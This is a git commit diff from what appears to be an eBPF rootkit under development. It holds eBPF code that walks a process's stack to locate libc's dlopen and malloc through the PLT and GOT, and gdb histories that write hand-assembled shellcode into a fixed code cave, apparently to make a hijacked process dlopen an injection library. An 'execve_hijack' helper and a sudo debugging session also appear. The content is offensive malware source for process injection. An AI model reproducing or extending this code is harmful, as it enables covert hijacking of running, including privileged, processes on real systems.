Adapted memory analysis to larger memory addresses inside the virtual address space. Solved bugs and others, adapting code for RELRO.

2025-12-16 23:33:06 +08:00 · 2022-04-04 17:07:45 -04:00
parent 8f28c3a883
commit 748062f464
13 changed files with 12256 additions and 11528 deletions
--- a/resources/.gdb_history
+++ b/resources/.gdb_history
@@ -0,0 +1,91 @@
+q
+disass main
+b main
+r
+q
+b * 0x0000000000001189
+r
+si
+q
+b main
+del 1
+b 0x0000000000001189
+b *0x0000000000001189
+r
+q
+b main
+r
+disass main
+b __init
+q
+starti
+si
+disass main
+q
+starti
+q
+b main
+r
+x/16x *(rbp)
+x/16x *(rbp-0x14)
+d *(rbp-0x14)
+d ç(rbp-0x14)
+p (rbp-0x14)
+p ($rbp-0x14)
+p/d ($rbp-0x14)
+p/x ($rbp-0x14)
+p ($rbp-0x14)
+x/2b ($rbp-0x14)
+x/2b ($rbp-0x20)
+x/8b ($rbp-0x20)
+x/10b ($rbp-0x20)
+x/12b ($rbp-0x20)
+x/20b ($rbp-0x20)
+x/22b ($rbp-0x20)
+x/26b ($rbp-0x20)
+x/28b ($rbp-0x20)
+x/12b ($rbp-0x20)
+x/14b ($rbp-0x20)
+si
+x/10i $rax
+x/10i 0x555555555070
+x/20i 0x555555555070
+x/30i 0x555555555070
+si
+q
+starti
+b main
+c
+si
+b __dlopen
+c
+q
+b main
+r
+si
+ni
+si
+ni
+c
+q
+b main
+r
+si
+ni
+si
+ni
+q
+b main
+r
+si
+find dlopen
+q
+b main
+r
+si
+ni
+q
+b main
+r
+si
+q
--- a/resources/peda-session-example_dlopen.txt
+++ b/resources/peda-session-example_dlopen.txt
@@ -0,0 +1,2 @@
+break main
+
--- a/src/.output/kit.o
+++ b/src/.output/kit.o
--- a/src/.output/kit.skel.h
+++ b/src/.output/kit.skel.h
--- a/src/bin/kit
+++ b/src/bin/kit
--- a/src/ebpf/include/bpf/injection.h
+++ b/src/ebpf/include/bpf/injection.h
@@ -14,6 +14,7 @@
 #define OPCODE_JUMP_BYTE_0 0xe8
 #define GLIBC_OFFSET_MAIN_TO_SYSCALL 0xf00d0
 #define GLIBC_OFFSET_MAIN_TO_DLOPEN 0x12f120
+#define GLIBC_OFFSET_MAIN_TO_MALLOC 0x6eca0
 #define CODE_CAVE_ADDRESS 0x0000000000402e95

 struct sys_timerfd_settime_enter_ctx {
@@ -60,29 +61,35 @@ static __always_inline int check_syscall_opcodes(__u8* opcodes){

 static __always_inline int stack_extract_return_address_plt(__u64 stack){
    //We have a possible call instruction, we check if it starts with the correct format
-    __u8 *op = (__u8*)(stack - 0x5);
+    __u64 *op = (__u64*)(stack - 0x5);
    __u8 opcode_arr[5];
-    bpf_probe_read(&opcode_arr, 5*sizeof(__u8), op);
+    if(bpf_probe_read(&opcode_arr, 5*sizeof(__u8), op)<0){
+        //bpf_printk("Failed to read stack position\n");
+        return -1;
+    }
+    //bpf_printk(" -- Checking: %lx, res: %x %x", op, opcode_arr[0], opcode_arr[1]);
+    //bpf_printk("%x %x %x\n", opcode_arr[2], opcode_arr[3], opcode_arr[4]);
    if (opcode_arr[0] != OPCODE_JUMP_BYTE_0) {
        //bpf_printk(" -- Failed OPCODE: %x\n", opcode_arr[0]);
        return -1;
    }
+    bpf_printk("Success OPCODE: %lx\n", op);

    //We have localized the call instruction and thus quite probably the saved RIP. 
    //We proceed to get the offset of the call.
-    __u32 offset;
-    if(bpf_probe_read_user(&offset, sizeof(__u32), &op[1])<0){
+    __s32 offset = 0;
+    __u8* op8 = (__u8*)(stack - 0x5);
+    if(bpf_probe_read_user(&offset, sizeof(__s32), &op8[1])<0){ //This takes the 4 MSB omitting the first
        bpf_printk("Failed to read op[1]\n");
        return -1;
    }
-    bpf_printk("OP[1]: %x\n", &op[1]);
+    bpf_printk("OP64[1]: %x\n", &op[1]);
+    bpf_printk("OP8[1]: %x\n", &op8[1]);
    bpf_printk("OFFSET: %x\n", offset);
-    bpf_printk("OFFSET8: %x\n", (__u8)offset);
-    bpf_printk("OP8: %x\n", (__u8*)op);
-    __u32 sum = (uintptr_t)(op+offset+5);
-    bpf_printk("SUM: %x\n", sum);
-    
-    __u8* call_addr = (__u8*)(__u64)sum;
+    bpf_printk("OP: %lx\n", op);
+    __u64 sum = (uintptr_t)((__u64)(op8)+offset+5);
+    bpf_printk("SUM: %lx\n", sum);
+    __u64* call_addr = (__u64*)sum;

    //We check which address was called. We could either be at libc already after
    //following it, or in the PLT entry on the same executable as before.
@@ -98,19 +105,19 @@ static __always_inline int stack_extract_return_address_plt(__u64 stack){
    bpf_printk("CALL_OPCODES: %lx\n", call_opcode);

    bpf_probe_read_user(&opcode_arr, 2*sizeof(__u8), call_addr);
-    //bpf_printk("OPCODE0: %x\n", opcode_arr[0]);
-    //bpf_printk("OPCODE1: %x\n", opcode_arr[1]);
+    bpf_printk("OPCODE0: %x\n", opcode_arr[0]);
+    bpf_printk("OPCODE1: %x\n", opcode_arr[1]);

+    __u8* call_addr_arr = (__u8*)call_addr;
    if(opcode_arr[0]==0xff && opcode_arr[1]==0x25){
        bpf_printk("Found PLT entry\n");
        //We analyze the offset of the jump specified ff 25 XX XX XX XX
-        //The address to which the jump takes us should be the actual syscall setup
-        __u32 j_offset;
-        bpf_probe_read_user(&j_offset, sizeof(__u32), &call_addr[2]);
-        //j_offset += 6;
+        //The address to which the jump takes us from the PLT.GOT should be the actual syscall setup
+        __s32 j_offset;
+        bpf_probe_read_user(&j_offset, sizeof(__s32), &call_addr_arr[2]); //4 LSB 
        //We obtain the address of the jump by adding the offset + our current memory address + 6 bytes of the current instruction
-        __u64* j_addr = (u64*)(call_addr + j_offset + 6);
-        bpf_printk("JOFFSET: %x\n", j_offset);
+        __u64* j_addr = (u64*)((__u64)(call_addr_arr) + j_offset + 0x6);
+        bpf_printk("JOFFSET: %lx\n", j_offset);
        bpf_printk("JADDR: %lx\n", j_addr);
        //Now that we have the address of the jump, we proceed to get the instruction opcodes there
        //However it's a bit more complex since what we have is the address in the GOT section where
@@ -257,6 +264,7 @@ int sys_exit_timerfd_settime(struct sys_timerfd_settime_exit_ctx *ctx){
    bpf_printk("PID: %u, SYSCALL_ADDR: %lx, STACK_RET_ADDR: %lx", pid, addr.libc_syscall_address, addr.stack_ret_address);
    bpf_printk("Address of libc main: %lx\n", addr.libc_syscall_address - GLIBC_OFFSET_MAIN_TO_SYSCALL);
    bpf_printk("Address of libc_dlopen_mode: %lx\n", addr.libc_syscall_address - GLIBC_OFFSET_MAIN_TO_SYSCALL + GLIBC_OFFSET_MAIN_TO_DLOPEN);
+    bpf_printk("Address of malloc: %lx\n", addr.libc_syscall_address - GLIBC_OFFSET_MAIN_TO_SYSCALL + GLIBC_OFFSET_MAIN_TO_MALLOC);

    return 0;
 }
--- a/src/helpers/.gdb_history
+++ b/src/helpers/.gdb_history
@@ -1,256 +1,256 @@
-q
-find 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0x401000 0x403000
-b *(test_time_values_injection+77 )
-r
-b __timerfd_settime 
-c
-find 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0x401000 0x403000
-x/128i 0x402e95
-x/128x 0x402e95
-x/128x 0x402e90
-x/128i 0x402e90
-x/128i 0x402e89
-x/10i 0x402e89
-x/10i 0x402e90
-x/10i 0x402e80
-x/128i 0x402e89
-x/256i 0x402e89
-x/256i 0x402e90
-find 0x90909090909090909090909090909090 0x401000 0x403000
 context
-x/10i 401520
-x/10i 0x401520
-x/10i 0x401260
-x/10i 0x401250
+set *(int64_t *)0x402ead = 0x6F2F650440C76D6F
+set *(int64_t *)0x402eb5 = 0x65786F620840C773
+x/128b 0x402e95
+x/12i 0x402e95
+set *(int64_t *)0x402eb5 = 0x65786F620840C773
+set *(int64_t *)0x402ebd = 0xC746542F730C40C7
+set *(int64_t *)0x402ec5 = 0x40C772732F471040
+set *(int64_t *)0x402ecd = 0x1840C765682F6314
+set *(int64_t *)0x402ed5 = 0x731C40C77265706C
+
+set *(int64_t *)0x402edd = 0x656A2040C76E692F
+
+set *(int64_t *)0x402ee5 = 0x6E6F692440C77463
+set *(int64_t *)0x402eed = 0x2E62696C2840C75F
+
+set *(int64_t *)0x402ef5 = 0x4800006F732C40C7
+set *(int64_t *)0x402efd = 0x007FFFF7F165B0B8
+
+set *(int64_t *)0x402f05 = 0x894800000001BE00
+
+set *(int64_t *)0x402f0d = 0x00C481484889DCDF
+set *(int64_t *)0x402f1e = 0xD0FFE58948000010
+
+x/12i 0x402e95
+x/20i 0x402e95
+x/22i 0x402e95
+set *(int64_t *)0x402f0d = 0x00C48148DC8948DF
+x/22i 0x402e95
+set *(int64_t *)0x402f1e = 0xD0FFE58948000010
+x/22i 0x402e95
+set *(int64_t *)0x402f1e = 0x0000E58948000010
+x/22i 0x402e95
+set *(int64_t *)0x402f1e = 0x0
+x/22i 0x402e95
+set *(int64_t *)0x402f15 = 0x0000E58948000010
+set *(int64_t *)0x402f15 = 0xD0FFE58948000010
+x/22i 0x402e95
+x/25i 0x402e95
+si
+fin
+si
+ni
 q
-r
-disass /r 0x405130
-x/10i 0x401520
-q
-b *(test_time_values_injection+77 )
-disass /r test_time_values_injection
 b *(test_time_values_injection+169)
 r
-b __timerfd_settime 
-c
-x/10i 0x401250
-x/10i 0x401260
-x/10i 0x405130
-x/10 0x405130
-x/10x 0x405130
-c
-x/10x 0x405130
-x/10i 0x405130
-c
-x/10i 0x405130
+q
+disass /r test_time_values_injection 
+b *(test_time_values_injection+96)
+r
 si
-c
+si
+q
+b *(test_time_values_injection+96)
+r
+si
+q
+b *(test_time_values_injection+96)
+r
+si
+x/32b 0x5555555556a9
+x/32x 0x5555555556a9
+x/2i 0x5555555556a9
+disass 0x5555555556a9
+disass /r 0x5555555556a9
+q
+b *(test_time_values_injection+96)
+r
+si
+disass /r 0x5555555556ae
+q
+b *(test_time_values_injection+96)
+r
+si
+disass /r 0x5555555556ae
+q
 r
 q
 r
-b *0x4013a8
-r
-r
-r
-b test_time_values_injection 
-r
-s
 q
-b test_time_values_injection 
+b *(test_time_values_injection+96)
 r
-b 0x4013a8
-b *0x4013a8
-b *0x4013a4
+si
+q
+b *(test_time_values_injection+169)
+r
+si
+fin
+q
+b *(test_time_values_injection+169)
+r
+si
+q
+b *(test_time_values_injection+169)
+r
+si
+q
 r
 q
-b *0x4013a8
 r
-b test_time_values_injection 
-r
-n
 q
-b test_time_values_injection 
 r
-n
-ni
-del 1
-del 2
+q
 r
-b test_time_values_injection 
+q
+r
+q
 r
 q
 r
 q
 disass test_time_values_injection 
-q
+b *(test_time_values_injection+96)
 r
-q
 si
-b test_time_values_injection 
+disass 0x7ffff7ede56c
+disass /r 0x7ffff7ede56c
+q
+b *(test_time_values_injection+96)
 r
-b __timerfd_settime 
+si
+q
+b *(test_time_values_injection+96)
 r
-c
-del 1
-x/10i 0x405130
-c
+si
+x/2i 0x5555555556a9
+x/2b 0x5555555556a9
+x/22b 0x5555555556a9
+q
+b *(test_time_values_injection+96)
+r
+si
+disass /r 0x5555555556ae
+q
+b *(test_time_values_injection+169)
+r
+si
+q
+b *(test_time_values_injection+169)
+r
+q
+b *(test_time_values_injection+96)
+r
+q
+b *(test_time_values_injection+96)
 r
-b test
 q
 b test_time_values_injection 
 r
-n
 ni
 si
-ni
-si
-si
+fin
 q
-b test_time_values_injection 
 r
-x/10x 0x402e95
-x/10x 0x405130
-checksecq
 q
-checksecq
-checksec
-q
-checksec
-q
-q
-q
-q
-x/10x 0x402e95
-b test_time_values_injection 
 r
-x/10x 0x402e95
-x/10x 0x405130
-b __timerfd_settime 
-c
-x/10x 0x405130
-c
-x/10x 0x405130
 q
-b test_time_values_injection 
-r
-b __timerfd_settime 
-c
-si
-x/10x 0x405130
 disass test_time_values_injection 
-b *(test_time_values_injection+169 )
-c
-si
-x/10x 0x402e95
-q
-b test_time_values_injection 
+b *(test_time_values_injection+96)
 r
-b __timerfd_settime 
-c
-x/10x 0x402e95
-x/10x 0x405130
 si
-x/10x 0x405130
+q
+disass test_time_values_injection 
+b *(test_time_values_injection+94)
+r
+si
+q
+b *(test_time_values_injection+94)
+r
+si
+restart
+c
+r
+q
+b *(test_time_values_injection+94)
+r
+si
+q
+b *(test_time_values_injection+94)
+r
+si
+q
+b *(test_time_values_injection+94)
+r
+si
+q
+b *(test_time_values_injection+94)
+r
+si
+q
+b *(test_time_values_injection+94)
+r
+si
+q
+b *(test_time_values_injection+94)
+r
+si
+q
+b *(test_time_values_injection+94)
+r
+si
+q
+b *(test_time_values_injection+94)
+r
+si
+x/10x 0x5555555556a9
+x/10i 0x5555555556a9
+q
+b *(test_time_values_injection+94)
+r
+si
+q
+b *(test_time_values_injection+94)
+r
+si
+q
+b *(test_time_values_injection+94)
+r
+si
+q
+b *(test_time_values_injection+94)
+r
+si
+q
+b *(test_time_values_injection+94)
+r
+si
+x/10i 555555555510
+x/10i 0x555555555510
+x/10x 0x555555555510
+q
+b *(test_time_values_injection+94)
+r
+si
+x/10x 0x555555555510
+x/10i 0x555555555510
+q
+q
+q
+disass test_time_values_injection 
+b *(test_time_values_injection+167)
+r
+si
+find 0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+find 0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0x401000 0x403000
+context
+q
 b *(test_time_values_injection+169)
-c
+r
 si
-set *(int64_t *)0x402e95 0x10
-set *(int64_t *)0x402e95 = 0x10
-x/10x 0x405130
-x/10x 0x402e95
-set *(int64_t *)0x402e95 = 0x102131415161718191
-set *(int64_t *)0x7ffff7d89560 = 
-x/10x 0x402e95
-x/10i 0x402e95
-x/10b 0x402e95
-set *(int64_t *)0x402e95 = 0x50
-x/10b 0x402e95
-x/10i 0x402e95
-x/10i 0x7ffff7d89560
-set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F0000
-set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F00
-x/10i 0x402e95
-x/10b 0x402e95
-set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
-x/10b 0x402e95
-x/10i 0x402e95
-disass /r 0x402e95
-disass 0x402e95
-disass /r *0x402e95
-x/10i 0x402e95
-x/10x 0x405130
-x/10i 0x405130
 x/10i 0x401260
-x/10b 0x401260
-x/10i 0x402e95
-x/10b 0x401260
-x/10i 0x402e95
-x/10b 0x402e95
-set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
-set *(int64_t *)0x402e9d = 0xffe0
-x/10b 0x402e95
-context
-si
-x/10i 0x402e95
-si
 q
-b test_time_values_injection 
-r
 b *(test_time_values_injection+169)
 r
-c
-x/10i 0x402e95
-x/10b 0x401260
-x/10x 0x405130
 si
-set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
-x/10b 0x402e95
-x/10i 0x402e95
-set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
-x/10b 0x402e95
-set *(int64_t *)0x402e9d = 0x0000ffe0
-x/10b 0x402e95
-set 0x402e9d = 0xffe000000
-x/10b 0x402e95
-x/12b 0x402e95
-x/10i 0x402e95
-set 0x402e95 = 0x48B86095D8F7FF7F0000
-set 0x402e95 = 0x48B86095D8F7FF7F
-set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
-x/10b 0x402e95
-x/14b 0x402e95
-x/20b 0x402e95
-set *(int64_t *)0x402e9d = 0x0000ffe0
-x/20b 0x402e95
-x/20i 0x402e95
-x/20b 0x402e95
-x/10i 0x401230
-disass /r test_time_values_injection 
-x/10i 0x4013a0
-x/10b 0x4013a0
-x/20b 0x402e95
-set *(int64_t *)0x402e9d = 0xffe000000
-x/20b 0x402e95
-set *(int64_t *)0x402e9d = 0xffe00000
-x/20b 0x402e95
-x/10i 0x4013a0
-x/20i 0x402e95
-x/20b 0x402e95
-set *(int64_t *)0x402e95 = 0x7FFFF7D89560B848
-x/20b 0x402e95
-x/20i 0x402e95
-set *(int64_t *)0x402e9d = 0xe0ff00000
-x/20i 0x402e95
-x/20b 0x402e95
-set *(int64_t *)0x402e9d = 0xe0ff0000
-x/20i 0x402e95
-set *(int64_t *)0x402e95 = 0x7FFFF7D89560B848
-x/20i 0x402e95
-context
-si
-si
-si
-si
-si
-c
 q
--- a/src/helpers/Makefile
+++ b/src/helpers/Makefile
@@ -12,7 +12,7 @@ execve_hijack.o: execve_hijack.c $(HEADERS)
 	clang -g -c execve_hijack.c

 execve_hijack: execve_hijack.o lib/libRawTCP_Lib.a
-	clang -lm -g -o execve_hijack execve_hijack.o -ldl -L. lib/libRawTCP_Lib.a
+	clang -g -o execve_hijack execve_hijack.o -ldl -L. lib/libRawTCP_Lib.a

 clean:
 	-rm -f execve_hijack.o
--- a/src/helpers/execve_hijack
+++ b/src/helpers/execve_hijack
--- a/src/helpers/execve_hijack.o
+++ b/src/helpers/execve_hijack.o
--- a/src/helpers/opcode_reverser.py
+++ b/src/helpers/opcode_reverser.py
@@ -0,0 +1,15 @@
+#!/usr/bin/env python3
+import sys
+from itertools import chain
+
+while True:
+    arg = input()[::-1]
+    group = 2
+    result = "".join(chain.from_iterable([reversed(elem) for elem in zip(*[iter(arg)]*group)]))
+
+    if(len(result) != len(arg)):
+        print("String not with even characters?")
+        #exit(1)
+
+    print(result)
+
--- a/src/helpers/peda-session-execve_hijack.txt
+++ b/src/helpers/peda-session-execve_hijack.txt
@@ -1,4 +1,2 @@
-break test_time_values_injection
-break __dlopen
 break *(test_time_values_injection+169)

--- a/src/helpers/peda-session-sudo.txt
+++ b/src/helpers/peda-session-sudo.txt
@@ -1,5 +1,3 @@
-break test_time_values_injection
-disable $bpnum
-break *(test_time_values_injection+169)
+break *(test_time_values_injection+94)
 disable $bpnum